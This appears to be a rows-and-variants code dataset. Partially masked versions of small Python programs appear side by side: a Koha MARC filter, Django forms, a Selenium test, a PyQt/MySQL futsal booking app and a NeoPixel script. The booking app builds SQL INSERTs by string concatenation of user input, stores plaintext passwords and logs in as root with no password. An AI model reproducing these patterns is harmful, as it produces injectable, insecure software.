valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
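# Usage sketch with a hand-built 952 field (pymarc pre-5.0 flat-subfield style;
# pymarc 5+ expects Subfield namedtuples instead):
#   from pymarc import Field
#   item = Field(tag='952', indicators=[' ', ' '],
#                subfields=['c', 'MAIN', 'y', 'BOOK'])
#   validate_item(item)  # -> True: valid location/type and no status flags set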
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
            writer = MARCWriter(open(options['--output'] or 'out.mrc', 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
main()
| """Usage:
sharedprint.py INPUT [--output=out.mrc]
sharedprint.py INPUT [--csv=greenglass.csv]
Process Koha MARC export for SCELC Shared Print.
The two uses above either 1) create a subset of the MARC input that's limited to
circulating items only or 2) perform a comparison between what's in the catalog
and what's in GreenGlass i.e. how many records were added and weeded.
Arguments:
INPUT MARC records (.mrc file)
Options:
-h --help show this usage information
--debug show debug information as the script runs
--output=FILE output records to this file [default: out.mrc]
--csv=CSV GreenGlass CSV to compare input MARC file against
"""
import csv
from docopt import docopt
from pymarc import MARCReader, MARCWriter
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=LOST
lost_codes = {
"0": "",
"1": "Lost",
"2": "Long Overdue (Lost)",
"3": "Lost and Paid For",
"4": "Missing",
"5": "Lost (On Search)",
"6": "Claims Returned",
}
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=NOT_LOAN
notforloan_codes = {
"-3": "Repair",
"-2": "In Processing",
"-1": "Ordered",
"0": "",
"1": "Library Use Only",
"2": "Staff Collection",
"3": "Bindery",
"4": "By Appointment",
"5": "On display",
}
# https://library-staff.cca.edu/cgi-bin/koha/admin/authorised_values.pl?searchfield=LOC
valid_locations = [
"CART",
"FACDEV",
"MAIN",
"NEWBOOK",
"DISPLAY",
]
# https://library-staff.cca.edu/cgi-bin/koha/admin/itemtypes.pl
valid_types = [
"BOOK",
"SUPPL",
]
# name of column in the GreenGlass spreadsheet that contains the bib record ID
GG_ID_COLUMN = 'Bib Record Number'
# field and subfield in MARC record that contains the bib record ID
# Koha appears to store it in both 999$c & $d
MARC_ID_FIELD = '999'
MARC_ID_SUBFIELD = 'c'
def validate_item(item):
# "item status" is an agglomeration of several things
status = []
# whether the _item_ we're looking at should be included
valid = True
# checked out, will be a date if item is checked out
if item['q'] and item['q'] != "0":
status.append('checked out')
# "not for loan", variety of reasons why an item might not circ
if item['7'] and item['7'] != "0":
status.append(notforloan_codes[item['7']])
valid = False
    # 1 if an item is damaged
if item['4'] and item['4'] != "0":
status.append('damaged')
valid = False
# lost, variety of codes
if item['1'] and item['1'] != "0":
status.append(lost_codes[item['1']])
valid = False
# 1 if an item has been withdrawn
if item['0'] and item['0'] != "0":
status.append('withdrawn')
valid = False
# filter items based on location & type
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
        print('item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
# 1) first mode: write a MARC output file
if not options['--csv']:
            writer = MARCWriter(open(options['--output'] or 'out.mrc', 'wb'))
for record in reader:
# whether we'll include the _bib_ record in export file
include_record = False
# Koha stores item data in 952 fields, one per item
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
# if there's any valid item then the bib should be included
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count, valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
# stop looking at items after we find the first valid one
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
# print(options)
main()
| [
1,
2,
3,
5,
6
] |
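The comparison mode above boils down to two set differences; a minimal standalone sketch of that logic with invented record IDs (not real Koha or GreenGlass data):

# Hypothetical bib IDs standing in for the Koha and GreenGlass sets.
koha_record_ids = {'1001', '1002', '1003', '1005'}
gg_record_ids = {'1001', '1002', '1004'}

# Weeded: in the GreenGlass snapshot but no longer circulating in Koha.
print('Weeded: %i' % len(gg_record_ids - koha_record_ids))  # 1
# Added: circulating in Koha but absent from GreenGlass.
print('Added: %i' % len(koha_record_ids - gg_record_ids))  # 2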
680 | 3d45fd7dcb3b382efaefe2797ebeb33216a840fa | <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
<mask token>
<mask token>
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
<mask token>
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| <mask token>
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| from django import forms
from .models import Picture
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError(
'Должно быть заполнено только одно из полей')
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'
] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0'
)
| from django import forms
from .models import Picture
class PictureUploadForm(forms.ModelForm):
class Meta:
model = Picture
exclude = ()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['img'] and cleaned_data['urlImg']:
raise forms.ValidationError("Должно быть заполнено только одно из полей")
class PictureUpdateForm(forms.Form):
width = forms.IntegerField()
height = forms.IntegerField()
size = forms.FloatField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'form-control text-center'
field.help_text = ''
def clean(self):
cleaned_data = super().clean()
if cleaned_data['width'] < 1 or cleaned_data['height'] < 1 or cleaned_data['size'] < 1:
raise forms.ValidationError('Значения в полях должны быть больше 0') | [
5,
6,
7,
8,
9
] |
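A minimal sketch of exercising the cross-field clean() above; it assumes Django is installed with settings configured, and the import path myapp.forms is hypothetical:

from myapp.forms import PictureUpdateForm  # hypothetical module path

form = PictureUpdateForm(data={'width': 0, 'height': 600, 'size': 1.5})
assert not form.is_valid()           # width < 1 trips the clean() check
print(form.errors['__all__'])        # non-field error raised by clean()

form = PictureUpdateForm(data={'width': 800, 'height': 600, 'size': 1.5})
assert form.is_valid()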
681 | d84641ce2854d4af26cd46abbe9557d6006cfc2e | <mask token>
| <mask token>
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
<mask token>
print(title)
assert 'Google' == title
browser.close()
| <mask token>
capabilities = {'browserName': 'firefox', 'browserVersion': '92.0',
'selenoid:options': {'enableVNC': True, 'enableVideo': True}}
browser = webdriver.Remote(command_executor='http://localhost:4444/wd/hub',
desired_capabilities=capabilities)
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert 'Google' == title
browser.close()
| import time
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from webdriver_manager.firefox import GeckoDriverManager
from webdriver_manager.microsoft import EdgeChromiumDriverManager
import os
from selenium import webdriver
capabilities = {'browserName': 'firefox', 'browserVersion': '92.0',
'selenoid:options': {'enableVNC': True, 'enableVideo': True}}
browser = webdriver.Remote(command_executor='http://localhost:4444/wd/hub',
desired_capabilities=capabilities)
browser.get('https://www.google.com')
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert 'Google' == title
browser.close()
| import time
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from webdriver_manager.firefox import GeckoDriverManager
from webdriver_manager.microsoft import EdgeChromiumDriverManager
import os
# caps = {'browserName': os.getenv('BROWSER', 'firefox')}
# browser = webdriver.Remote(
# command_executor='http://localhost:4444/wd/hub',
# desired_capabilities=caps
# )
from selenium import webdriver
capabilities = {
"browserName": "firefox",
"browserVersion": "92.0",
"selenoid:options": {
"enableVNC": True,
"enableVideo": True
}
}
browser = webdriver.Remote(
command_executor="http://localhost:4444/wd/hub",
desired_capabilities=capabilities)
browser.get("https://www.google.com")
time.sleep(3)
browser.maximize_window()
title = browser.title
print(title)
assert "Google" == title
browser.close()
#browser.quit() | [
0,
1,
2,
3,
4
] |
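A sketch of the same remote Selenoid session with explicit cleanup; the hub URL, browser version, and capabilities are carried over from the snippet, which uses the Selenium 3-style desired_capabilities argument:

from selenium import webdriver

capabilities = {'browserName': 'firefox', 'browserVersion': '92.0',
                'selenoid:options': {'enableVNC': True, 'enableVideo': True}}
browser = webdriver.Remote(command_executor='http://localhost:4444/wd/hub',
                           desired_capabilities=capabilities)
try:
    browser.get('https://www.google.com')
    assert 'Google' == browser.title
finally:
    browser.quit()  # quit() (not just close()) releases the Selenoid session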
682 | bad719d968b4e358f863b7ef13bc12127f726806 | <mask token>
| <mask token>
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| <mask token>
import logging
import os
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| # -*- coding: utf-8 -*-
"""Testing constants for Bio2BEL FlyBase."""
import logging
import os
log = logging.getLogger(__name__)
dir_path = os.path.dirname(os.path.realpath(__file__))
TEST_FILE = os.path.join(dir_path, 'test_gene_map_table.tsv.gz')
| null | [
0,
1,
2,
3
] |
683 | 0ff6e22f8704a0c6c0ffff3c53761b9d3a531b6d | <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
<mask token>
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
<mask token>
| <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
<mask token>
app.exec_()
| <mask token>
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_()
| from PyQt5 import QtWidgets, uic
import sys
import pymysql
import mysql.connector
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet('image: url(sorce/roundicon.png)')
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
sql = 'SELECT * FROM admin WHERE username=%s AND password=%s'
data = cur.execute(sql, (user, pw))
if len(cur.fetchall()) > 0:
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet('background-image: url(sorce/lp2.jpg)')
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit,
'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_()
| # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
from PyQt5 import QtWidgets, uic
import sys
import pymysql
import mysql.connector
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet("image: url(sorce/roundicon.png)")
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
sql = "SELECT * FROM admin WHERE username=%s AND password=%s"
data = cur.execute(sql, (user, pw))
if(len(cur.fetchall()) > 0):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet("background-image: url(sorce/lp2.jpg)")
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit, 'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
insert = (user, pw)
sql = "INSERT INTO admin (username, password) VALUES" + str(insert)
data = cur.execute(sql)
self.close()
        self.__init__()
# booking.Ui_Booking().Boking()
# koneksi.Koneksi()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
insert = (nama, nominal)
sql = "INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES" + str(insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_() | [
5,
7,
8,
9,
10
] |
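The INSERTs above splice values in via str() of a tuple, which happens to parse but is injection-prone; a sketch of the same two queries with driver-side placeholders, assuming the same local bookingfutsal schema (the sample values are invented):

import pymysql

con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
                      host='localhost', port=3306, autocommit=True)
cur = con.cursor()
# %s placeholders let pymysql escape the values safely.
cur.execute('INSERT INTO admin (username, password) VALUES (%s, %s)',
            ('someuser', 'somepass'))
cur.execute('INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES (%s, %s)',
            ('Budi', '50000'))
con.close()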
684 | 5ff7a3843314dfd3914c5e96164385d61fbe7fa5 | <mask token>
| <mask token>
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| <mask token>
count = int(sys.argv[1])
percent = int(sys.argv[2])
LED_COUNT = count
LED_PIN = 18
LED_FREQ_HZ = 800000
LED_DMA = 5
LED_BRIGHTNESS = 255
LED_INVERT = False
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
lightUp = math.floor(percent / count)
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| import sys
import time
import math
from neopixel import *
count = int(sys.argv[1])
percent = int(sys.argv[2])
LED_COUNT = count
LED_PIN = 18
LED_FREQ_HZ = 800000
LED_DMA = 5
LED_BRIGHTNESS = 255
LED_INVERT = False
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
lightUp = math.floor(percent / count)
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| import sys
import time
import math
from neopixel import *
count = int(sys.argv[1])
percent = int(sys.argv[2])
# LED strip configuration:
LED_COUNT = count # Number of LED pixels.
